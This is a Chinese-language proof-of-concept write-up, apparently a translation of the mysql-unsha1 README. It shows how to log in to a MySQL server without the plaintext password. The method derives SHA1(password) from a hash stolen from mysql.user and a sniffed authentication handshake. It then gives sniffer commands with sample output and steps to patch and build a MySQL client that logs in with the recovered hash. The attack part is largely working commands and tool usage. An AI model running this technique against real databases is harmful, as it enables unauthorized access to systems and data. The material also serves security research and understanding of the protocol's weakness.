mysql-unsha1：在未知密码情况下，登录任意MYSQL数据库

摘要

这个POC用于在不知道明文密码的情况下对启用了密码安全认证插件（默认开启插件：mysql_native_password）的MYSQL数据库进行登录。

前提条件为：

1.为了获取到已知用户的hash，我们需要读取到目标数据库中的mysql.user表。
2.能够拦截到上述已知用户执行成功的认证信息（即通过SSL认证无法攻击成功）。

注意：这并不是MYSQL的一个漏洞，只是认证协议工作的直接后果。如果攻击者已经满足了上面两个前提，那么整个系统应该是已经被攻破了。则这篇文章只是对MYSQL服务器获取权限的另外一种思路。

MySQL服务器密码

在默认情况下，所有密码应该是存放在数据库中的mysql.user表中，并且使用PASSWORD()方法对密码进行两次SHA1摘要。

mysql> SELECT DISTINCT password FROM mysql.user WHERE user = 'root';
*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19

mysql> SELECT PASSWORD('password');
*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19

mysql> SELECT SHA1(UNHEX(SHA1('password')));
2470c0c06dee42fd1618bb99005adca2ec9d1e19

握手认证

下方公式不能直接在mysql的客户端使用sha1进行计算，具体原因不明，但是使用java代码是可以得到想要的结果的。

客户端发送TCP连接信息之后，MYSQL握手认证的简化步骤大致如下：
1. 服务端发送一个包含盐(s)的数据包
2. 客户端回应一个包含处理过后的密码(x)的登录请求，密码加密算法为：

x := SHA1(password) XOR SHA1(s + SHA1(SHA1(password)))

其中password是用户提供的，"+"是将字符串链接起来。
3. 如果满足下面等式，服务端会确认登录成功：

SHA1(x XOR SHA1(s + SHA1(SHA1(password)))) = SHA1(SHA1(password))

其中SHA1(SHA1(password))是对密码进行两次SHA1摘要，然后储存到mysql.user表中。并且服务端并不知道密码以及它的SHA1摘要是什么。

漏洞利用

攻击者已经能够获得SHA1(password)，因此我们可以在不知道明文的密码情况下对服务端进行欺骗。

步骤如下：

1.将h设置为我们在mysql.user表中得到的经过编码的password。
2.s和x是我们通过拦截通信得到的盐和经过处理的密码。

所以，第一步对密码进行的SHA1可以表示为：

SHA1(password) = x XOR SHA1(s + h)

攻击工具

为了可以更加方便的利用这个漏洞，为这个PoC提供了两个利用工具：

1.一个简单的嗅探器，用于从PCAP文件中提取和检查实时或离线的握手信息;
2.允许将登录的密码设置为SHA1摘要，而不是明文密码的补丁.

嗅探器

安装mysql-unsha1-sniff只需要运行make命令（或者使用make static生成一个静态链接可执行文件）。Makefile将在此目录下查找uthash.h文件，如果不存在，就去下载它。

运行不带参数的mysql-unsha1-sniff，将显示用法。

例子：

sudo ./mysql-unsha1-sniff -i lo 127.0.0.1 3306 2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19:root

一旦成功抓到握手认证信息，数据会像下面一样：

[+] Input:
[+] - username ........................ 'root'
[+] - salt ............................ 3274756c42415d3429717e482a3776704d706b49
[+] - client session password ......... 6d45a453b989ad0ff0c84daf623e9870f129c329
[+] - SHA1(SHA1(password)) ............ 2470c0c06dee42fd1618bb99005adca2ec9d1e19
[+] Output:
[+] - SHA1(password) .................. 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
[+] Check:
[+] - computed SHA1(SHA1(password)) ... 2470c0c06dee42fd1618bb99005adca2ec9d1e19
[+] - authentication status ........... OK

如果没有提供帐户信息，工具将仅显示salt和会话密码。

mysql客户端补丁

搭建mysql客户端需要一些时间，并且确保您的磁盘有足够的空间。

1下载并且解压MySQL源码：

wget https://github.com/mysql/mysql-server/archive/mysql-5.7.17.tar.gz
tar xf mysql-5.7.17.tar.gz
cd mysql-server-mysql-5.7.17

2.安装补丁

patch -p1 </path/to/mysql-server-unsha1.patch

3.编译：

mkdir build
cd build
cmake -DDOWNLOAD_BOOST=1 -DWITH_BOOST=boost -DWITHOUT_SERVER:BOOL=ON ..
make -j$(nproc)

4.客户端文件将在client/mysql文件夹中产生，设置环境变量。安装完成之后删除源码节省重空间。

sudo cp client/mysql /usr/local/bin/mysql-unsha1
cd ../..
rm -fr mysql-server-mysql-5.7.17

使用mysql-unsha1作为原始的MySQL客户端，并且只需要了解–password[=password], -p[password]选项需要一个长度为40的SHA1摘要。

使用前面获取到的SHA1进行登录：

mysql-unsha1 -h 127.0.0.1 -P 3306 -u root --password=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

其中：

mysql> SELECT SHA1(UNHEX('5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'));
2470c0c06dee42fd1618bb99005adca2ec9d1e19

2470c0c06dee42fd1618bb99005adca2ec9d1e19是在mysql.user表里面的密码。